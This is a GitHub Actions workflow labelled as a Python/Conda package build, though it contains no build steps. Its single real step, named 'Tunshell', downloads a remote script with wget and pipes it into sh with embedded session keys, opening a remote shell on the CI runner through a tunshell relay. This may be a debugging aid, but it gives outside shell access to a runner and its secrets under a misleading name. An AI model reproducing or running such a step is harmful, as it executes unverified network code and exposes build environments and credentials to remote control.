name: Python Package using Conda

on: [push]

jobs:
  build-linux:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5

    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.8
      uses: actions/setup-python@v2
      with:
        python-version: 3.8
    - name: Tunshell
      run: |
        wget https://lets.tunshell.com/init.sh -O - 2> /dev/null | sh -s -- T AkkVv8uEzlaU24vZiUWMS6 gBvcy1pIPLeGUEfwhWV6AB au.relay.tunshell.com
        
